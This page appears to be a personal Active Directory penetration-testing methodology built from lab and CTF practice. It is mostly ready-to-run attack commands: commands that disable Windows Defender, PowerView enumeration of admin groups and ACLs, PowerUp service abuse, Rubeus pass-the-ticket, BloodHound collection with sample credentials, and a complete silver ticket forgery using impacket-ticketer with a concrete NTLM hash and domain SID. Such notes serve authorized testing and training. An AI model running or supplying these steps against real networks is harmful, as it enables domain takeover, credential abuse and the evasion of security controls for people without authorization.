Methodology

This Page shows the Complete methodology for Active Directory Pentesting

Enumerating AD Environment

Listing Shares on Windows

## view the shares
net view \\Computername.abc.corp  

## List the Shares
dir \\computer-name.abc.corp

Impacket-SmbServer to Host Files

We can use impacket-smbserver to host files as well and Run files from this share as well.

impacket-smbserver -smb2support -user test -password test share $(pwd)

### without password
impacket-smbserver -smb2support share $(pwd)

then on Target windows machine, we need to connect to this share and run our tools.

net use \\IP_add_of_kali\share

Turn AV off

# Run in CMD
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all 
### In PowerShell
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

PowerView Enumerating Basic Stuff

Enumerate AD Users

Only Get-DomainUser command will print very Long info so you can use below command to filter just the usernames

Get-DomainUser | select -ExpandProperty samaccountname

Enumerating AD Computers

This command will get all of the computer names in the Domain.

Get-DomainComputer | select -ExpandProperty dnshostname

Enumerating Domain Admins Group

Get-DomainGroup -Identity "Domain Admins"

Enumerating Domain Admins Group Members

Get-DomainGroupMember -Identity "Domain Admins"

Enumerating Enterprise Admins Group Members

Get-DomainGroupMember -Identity "Enterprise Admins"
#We need to query the root domain as Enterprise Admins group is present only in the root of a forest.
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

PowerView Enumerating Advanced

Enumerating ACL's

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "USERNAME HERE"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GROUP NAME HERE"}

Enumerating Organizational Unit (OU)

Get-DomainOU | select -ExpandProperty name
#Now, to list all the computers in the DevOps OU:
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

Tools and Commands

Powerup.ps1

To Invoke any abuse function with your own username you can use below command.

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'DOMAIN\USERNAME' -Verbose

Bloodhound-python

We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration

 bloodhound-python --dns-tcp -ns 10.10.179.143 -d klendathu.vl -u 'zim' -p 'football22' -c all

Rubeus Commands.

# Request a TGT and Inject In Memory
Rubeus.exe asktgt /user:Username /rc4:HASH /domain:abc.local /ptt

## if you have password

Rubeus.exe asktgt /user:Username /password:password /domain:abc.local /ptt

Runas Command

runas /user:domain\username "C:\Windows\System32\cmd.exe"

PS-Session and Cred Object

$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\user', $SecPassword)

enter-pssession -computer abc.corp.local -credential $c

Silver Ticket Attack

In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.

For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code

# Below code will give NTLM Hash of test1234
import hashlib,binascii
hash = hashlib.new('md4', "test1234".encode('utf-16le')).digest();
print(binascii.hexlify(hash));

For Domain SID we can use

# Below command will print the Domain SID
impacket-lookupsid domain/username:[email protected]

now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use Impacket-ticketer

impacket-ticketer -spn MSSQLSvc/srv1.klendathu.vl -domain klendathu.vl -domain-sid S-1-5-21-641890747-1618203462-755025521 -nthash E2F156A20FA3AC2B16768F8ADD53D72C administrator

this will create a administrator.ccache file

#export the ticker
export KRB5CCNAME=administrator.ccache

# then use this ticket to access any service like MSSQL

impacket-mssqlclient -k -no-pass <domain name or subdomain>

#e.g

impacket-mssqlclient -k -no-pass SRV1.Klendathu.vl

Previous5000 - Pentesting Docker Registry NextHydra

Last updated 1 month ago